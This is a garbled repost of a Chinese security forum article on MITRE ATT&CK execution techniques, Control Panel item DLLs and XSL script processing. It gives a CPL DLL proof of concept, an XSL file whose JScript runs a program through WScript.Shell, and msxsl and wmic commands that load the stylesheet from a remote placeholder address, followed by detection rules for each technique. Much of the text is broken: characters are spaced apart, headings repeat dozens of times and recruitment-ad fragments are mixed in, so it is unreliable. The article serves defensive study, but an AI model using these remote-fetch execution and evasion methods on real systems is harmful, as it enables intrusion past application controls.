[6288] 2019-11-17_ATT&CK攻防初窥系列--命令执行

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-17
2019-11-17_ATT&CK攻防初窥系列--命令执行 A T T & C K - - E   2 0 1 9 - 1 1 - 1 7   A i L P H A N o . 1 N o . 1 使 N o . 2 N o . 2         A T T & C K t o p 3 A T T & C K A T T & C K M I T R E   A T T & C K   i s   a   g l o b a l l y - a c c e s s i b l e   k n o w l e d g e   b a s e   o f   a d v e r s a r y t a c t i c s   a n d   t e c h n i q u e s   b a s e d   o n   r e a l - w o r l d   o b s e r v a t i o n s . A T T & C K A T T & C K A T T & C K 使 A T T & C K A T T & C K A T T & C K A T T & C K         A T T & C K I n i t i a l   A c c e s s E x e c u t i o n P e r s i s t e n c e P r i v i l e g e   E s c a l a t i o n D e f e n s e E v a s i o n C r e d e n t i a l   A c c e s s D i s c o v e r y L a t e r a l   M o v e m e n t C o l l e c t i o n C 2 E x f i l t r a t i o n i m p a c t A T T & C K N o . 3 N o . 3 T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l T 1 1 9 6 - C o n t r o l   P a n e l I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s I t e m s         . e x e . c p l C P L . d l l C P l A p p l e t C o n t r o l _ R u n D L L A P I         使 C P L   .
/ /   d l l m a i n . c p p   :     D L L   # i n c l u d e   " s t d a f x . h " # i n c l u d e   < w i n d o w s . h > B O O L   A P I E N T R Y   D l l M a i n (   H M O D U L E   h M o d u l e ,                                             D W O R D     u l _ r e a s o n _ f o r _ c a l l ,                                             L P V O I D   l p R e s e r v e d                                         ) {         s w i t c h   ( u l _ r e a s o n _ f o r _ c a l l )       {         c a s e   D L L _ P R O C E S S _ A T T A C H :               W i n E x e c ( " c m d . e x e   / c   c a l c " ,   S W _ S H O W ) ;       c a s e   D L L _ T H R E A D _ A T T A C H :         c a s e   D L L _ T H R E A D _ D E T A C H :         c a s e   D L L _ P R O C E S S _ D E T A C H :                 b r e a k ;       }         r e t u r n   T R U E ; } a t t a c h d l l C P I A p p l e t . d l l ( ) , C P I A p p l e t . d l l C P I A p p l e t . c p l c o n t r o l . e x e   c : u s e r s W 1 0 P C 1 d e s k t o p C P I A p p l e t . c p l       / / c p l ( )
( 使 使 C o n t r o l _ R u n D L L ) r u n d l l 3 2 . e x e   s h e l l 3 2 . d l l , C o n t r o l _ R u n D L L   c : u s e r s W 1 0 P C 1 d e s k t o p C P I A p p l e t . c p l A P I D L L W i n d o w s W i n d o w s #   c o n t r o l . e x e r u n d l l 3 2 s h e l l 3 2 C o n t r o l _ R u n D L L p a y l o a d I m a g e   c o n t a i n s   ' r u n d l l 3 2 . e x e '   A N D   C o m m a n d L i n e   c o n t a i n s   ' S h e l l 3 2 . d l l '   A N D   C o m m a n d L i n e   c o n t a i n s   ' C o n t r o l _ R u n D L L '   A N D C o m m a n d L i n e   r e g e x   ' ^ . * . c p l $ '
#   p a y l o a d c p l C o n t r o l _ R u n D L L   A P I I m a g e   c o n t a i n s   ' r u n d l l 3 2 . e x e '   A N D   C o m m a n d L i n e   c o n t a i n s   ' S h e l l 3 2 . d l l '   A N D   C o m m a n d L i n e   c o n t a i n s ' C o n t r o l _ R u n D L L ' N o . 4 N o . 4 T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t T 1 2 2 0   X S L   S c r i p t P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g P r o c e s s i n g X S L   E X t e n s i b l e   S t y l e s h e e t   L a n g u a g e   ( W 3 C )     X S L     X M L   使 X S L A P P L o c k e r ( M S X S L . E X E )
m s x s l . e x e X S L X S L J a v a S c r i p t : h t t p s : / / w w w . m i c r o s o f t . c o m / e n - u s / d o w n l o a d / c o n f i r m a t i o n . a s p x ? i d = 2 1 7 1 4 m s x s l   m s x s l . e x e   { x m l f i l e }     { x s l f i l e }   X S L X M L 使 m s x s l . e x e   { x s l f i l e }   { x s l f i l e } x s l A i l . x s l < ? x m l   v e r s i o n = ' 1 . 0 ' ? > < x s l : s t y l e s h e e t   v e r s i o n = " 1 . 0 " x m l n s : x s l = " h t t p : / / w w w . w 3 . o r g / 1 9 9 9 / X S L / T r a n s f o r m " x m l n s : m s x s l = " u r n : s c h e m a s - m i c r o s o f t - c o m : x s l t " x m l n s : u s e r = " h t t p s : / / w w w . d b a p p s e c u r i t y . c o m . c n " > < m s x s l : s c r i p t   l a n g u a g e = " J S c r i p t "   i m p l e m e n t s - p r e f i x = " u s e r " >       f u n c t i o n   x m l ( n o d e l i s t )   { v a r   r   =   n e w   A c t i v e X O b j e c t ( " W S c r i p t . S h e l l " ) . R u n ( " c a l c . e x e " ) ;       r e t u r n   n o d e l i s t . n e x t N o d e ( ) . x m l ;     } < / m s x s l : s c r i p t > < x s l : t e m p l a t e   m a t c h = " / " >     < x s l : v a l u e - o f   s e l e c t = " u s e r : x m l ( . ) " / > < / x s l : t e m p l a t e > < / x s l : s t y l e s h e e t > m s x s l . e x e   A i l . x s l   A i l . x s l m s x s l . e x e   h t t p : / / x x x . x x x . x x x . x x x / A i l . x s l   h t t p : / / x x x . x x x . x x x . x x x / A i l . x s l
( W M I C . E X E ) w m i c : w m i c . e x e     { w m i c _ c o m m a n d }   / F O R M A T : { x s l _ f i l e } x s l { w m i c   c o m m a n d w m i c } w m i c   p r o c e s s   g e t   n a m e   / f o r m a t : A i l . x s l w m i c   p r o c e s s   g e t   n a m e   / f o r m a t : " h t t p : / / x x x . x x x . x x x . x x x / A i l . x s l "             / / f o r m a t
N o . 5 N o . 5 : 使 D L L M S X S L . E X E # M S X S L . E X E P a r e n t I m a g e   r e g e x   ' ^ . * m s x s l . e x e $ ' # M S X S L . E X E j s c r i p t . d l l I m a g e   r e g e x   ' ^ . * m s x s l . e x e $ '   A N D   I m a g e L o a d e d   c o n t a i n s   ' j s c r i p t . d l l ' W M I C . E X E
# W M I C . E X E j s c r i p t . d l l I m a g e   r e g e x   ' ^ . * w m i c . e x e $ '   A N D   I m a g e L o a d e d   c o n t a i n s   ' j s c r i p t . d l l ' N o . 6 N o . 6
S R C 广 1 .     S R C 线 访 2 .     R a n k 3 .     线 4 .     广 5 .         1 .       2 .       3 .     广 1 . 2 . 3 . 4 . 1 . 2 . 3 . 4 . 1 2   s t r a t e g y @ d b a p p s e c u r i t y . c o m . c n
1 1   V I   广 2 p h o t o s h o p / i l l u s t r a t o r / c o r e l d r e w / 3 1 9 1   s t r a t e g y @ d b a p p s e c u r i t y . c o m . c n W e b   1 3 - 3 0 K 1 + 广 1 . ; 2 . 沿 3 . ; 4 . 5 . W A F b y p a s s 1 . 1
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则